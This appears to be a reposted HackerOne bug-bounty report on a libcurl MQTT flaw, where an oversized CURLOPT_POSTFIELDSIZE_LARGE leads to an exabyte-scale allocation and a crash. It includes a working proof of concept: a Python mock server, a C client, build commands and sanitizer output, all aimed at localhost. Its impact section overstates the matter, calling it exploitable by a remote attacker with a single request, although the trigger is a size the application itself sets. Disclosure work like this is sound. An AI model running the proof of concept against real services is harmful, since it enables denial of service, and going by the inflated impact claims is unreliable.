# curl: libcurl MQTT `CURLOPT_POSTFIELDSIZE_LARGE` overflow leads to immediate DoS

- Report: H1:3417428 (<https://hackerone.com/reports/3417428>)
- Type: hackerone (bulletin family: bugbounty)
- Published: 2025-11-09T05:51:21
- Modified: 2025-11-10T15:00:34
- Last seen: 2025-11-10T15:25:59
- Reposted: 2025-11-10T09:36:05 at <https://zero.redgem.net/?p=25414> by invoker

## Summary
An attacker can crash or forcefully abort any application that uses libcurl's MQTT support by setting an excessively large value for `CURLOPT_POSTFIELDSIZE_LARGE`. The MQTT publish logic (`lib/mqtt.c::mqtt_publish`) trusts this value without validating it against the protocol's maximum remaining length (268,435,455) and without checking for arithmetic overflow. As a result, it attempts to allocate an impossibly large buffer (several exabytes) and immediately fails with either an abort (AddressSanitizer) or a `CURLE_OUT_OF_MEMORY` error, terminating the process and causing a Denial of Service.

## Impact
- **Availability:** Any service that allows untrusted input to influence `CURLOPT_POSTFIELDSIZE(_LARGE)`—for example, user-controlled message lengths or proxied MQTT requests—can be brought down instantly. A single malicious request is enough to trigger the crash.
- **Stability:** Even in non-ASan builds, the call consistently returns `CURLE_OUT_OF_MEMORY`; applications that treat this as fatal (common for MQTT producers) will shut down. When compiled with sanitizers, the process aborts on the spot due to an "allocation-size-too-big" assertion.
- **Scope:** No authentication or man-in-the-middle capability is required. Simply making the client construct a publish request with a massive length triggers the bug.

## Attack Scenario
1. The attacker convinces a libcurl-based MQTT client or gateway to publish a message whose size field is set to ~4 exabytes (or any value over 0x0FFFFFFF).
2. The client calls `curl_easy_setopt(handle, CURLOPT_POSTFIELDSIZE_LARGE, huge_value)` and eventually invokes `curl_easy_perform()`.
3. Inside `mqtt_publish`, libcurl calculates the MQTT remaining length as `payloadlen + topiclen + 2`, which wraps or exceeds the MQTT specification limit. It then calls `malloc(remaininglength + 1 + encodelen)`.
4. `malloc()` cannot satisfy the request and aborts (ASan) or returns NULL (if `allocator_may_return_null=1`). In either case, the application dies or enters a failure state, causing a denial of service without ever sending the payload to the broker.

## Proof of Concept
Two files are needed: a minimal MQTT mock server and a client PoC that sets an oversized payload length.

### `mqtt_server.py`
```python
import socket

HOST, PORT = "127.0.0.1", 1883
CONNACK = b"\x20\x02\x00\x00"

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind((HOST, PORT))
    s.listen(1)
    print(f"[server] listening on {HOST}:{PORT}")
    conn, addr = s.accept()
    with conn:
        print(f"[server] accepted connection from {addr}")
        data = conn.recv(1024)
        print(f"[server] received {len(data)} bytes")
        conn.sendall(CONNACK)
        print("[server] sent CONNACK")
        conn.recv(1024)
        print("[server] received publish (possibly truncated)")
```

### `mqtt_overflow.c`
```c
#include <curl/curl.h>
#include <stdio.h>

int main(void)
{
  CURL *curl = curl_easy_init();
  if(!curl) {
    fprintf(stderr, "curl_easy_init failed\n");
    return 1;
  }

  const char payload[] = "X";                       /* actual data: 1 byte */
  const curl_off_t fake_size = ((curl_off_t)1 << 62); /* advertise ~4 EB */

  curl_easy_setopt(curl, CURLOPT_URL, "mqtt://127.0.0.1:1883/topic");
  curl_easy_setopt(curl, CURLOPT_POSTFIELDS, payload);
  curl_easy_setopt(curl, CURLOPT_POSTFIELDSIZE_LARGE, fake_size);
  curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT_MS, 2000L);
  curl_easy_setopt(curl, CURLOPT_TIMEOUT_MS, 3000L);
  curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L);

  fprintf(stderr, "[*] requesting payload size: %lld\n", (long long)fake_size);

  CURLcode res = curl_easy_perform(curl);
  fprintf(stderr, "curl_easy_perform: %d\n", res);

  curl_easy_cleanup(curl);
  return (int)res;
}
```

### Build & Run
```bash
# Configure and build libcurl with MQTT enabled (example using CMake)
cmake -S . -B build-mqtt -DCMAKE_BUILD_TYPE=Debug -DCURL_USE_LIBPSL=OFF
cmake --build build-mqtt --target libcurl_shared -- -j8

# Compile PoC with AddressSanitizer
clang -fsanitize=address -Iinclude -Ibuild-mqtt/lib \
  -Lbuild-mqtt/lib -Wl,-rpath,build-mqtt/lib \
  build-mqtt/poc/mqtt_overflow.c -lcurl-d -o build-mqtt/poc/mqtt_overflow

# Launch mock server and execute PoC
python3 build-mqtt/poc/mqtt_server.py &
build-mqtt/poc/mqtt_overflow
```

### Observed Output (ASan build)
```
[*] requesting payload size: 4611686018427387904
*   Trying 127.0.0.1:1883...
* Established connection to 127.0.0.1 (127.0.0.1 port 1883) from 127.0.0.1 port 62013
* Using client id 'curlgqXILtsX'
==12584==ERROR: AddressSanitizer: requested allocation size 0x400000000000000c ...
SUMMARY: AddressSanitizer: allocation-size-too-big mqtt.c:616 in mqtt_publish
==12584==ABORTING
```

### Observed Output (allocator may return NULL)
```
$ ASAN_OPTIONS=allocator_may_return_null=1 build-mqtt/poc/mqtt_overflow
[*] requesting payload size: 4611686018427387904
==13457==WARNING: AddressSanitizer failed to allocate 0x400000000000000c bytes
curl_easy_perform: 27
```

The mock server log confirms that the connection is opened, a CONNACK is returned, and the client terminates immediately while trying to publish.

## Root Cause
Excerpt from `lib/mqtt.c`:
```c
remaininglength = payloadlen + 2 + topiclen;
encodelen = mqtt_encode_len(encodedbytes, remaininglength);

pkt = malloc(remaininglength + 1 + encodelen);
if(!pkt) {
  result = CURLE_OUT_OF_MEMORY;
  goto fail;
}
...
memcpy(&pkt[i], payload, payloadlen);
```
- `payloadlen` comes directly from `CURLOPT_POSTFIELDSIZE_LARGE`.
- There is no check that `payloadlen` stays within the MQTT specification (maximum remaining length 0x0FFFFFFF) or within any safe memory bounds.
- `remaininglength + 1 + encodelen` is computed in `size_t`, so it can wrap or exceed practical memory limits.
- On failure, the function never reaches the publish stage, effectively crashing the client before any data is sent.

## Recommended Mitigation
1. **Validate `payloadlen`:** Reject any request where `payloadlen > 0x0FFFFFFF - (topiclen + 2)` and return `CURLE_BAD_FUNCTION_ARGUMENT`.
2. **Overflow Guard:** Before calling `malloc`, ensure the sum `remaininglength + 1 + encodelen` cannot overflow and fits within a reasonable bound.
3. **Protocol Compliance:** Consider capping `mqtt_encode_len` to 4 bytes and aborting if the encoded length would exceed MQTT's remaining length limit.
4. **Regression Test:** Add a unit or integration test that attempts to set an oversized `CURLOPT_POSTFIELDSIZE_LARGE` and ensures the call fails gracefully.

## Environment
- macOS 15.0 (24A335)
- Apple Clang 17.0.0.17000319
- curl 8.17.1-dev (CMake build with MQTT enabled)
- AddressSanitizer (default settings) and libc runtime without ASan

## Severity
Medium — Denial of Service via integer overflow / uncontrolled resource consumption (CWE-190 / CWE-400).

## References
- MQTT Specification (v3.1.1) — Remaining Length field is limited to 268,435,455
- curl security program: <https://hackerone.com/curl>

## Impact

- Remote attacker can forcefully terminate any libcurl-based MQTT client or service by advertising an oversized MQTT payload.
- The malformed request causes libcurl to attempt an allocation of several exabytes, which immediately aborts the process (ASan) or returns CURLE_OUT_OF_MEMORY, effectively denying service.
- No authentication or special network position is required; a single malicious publish request suffices to crash the application.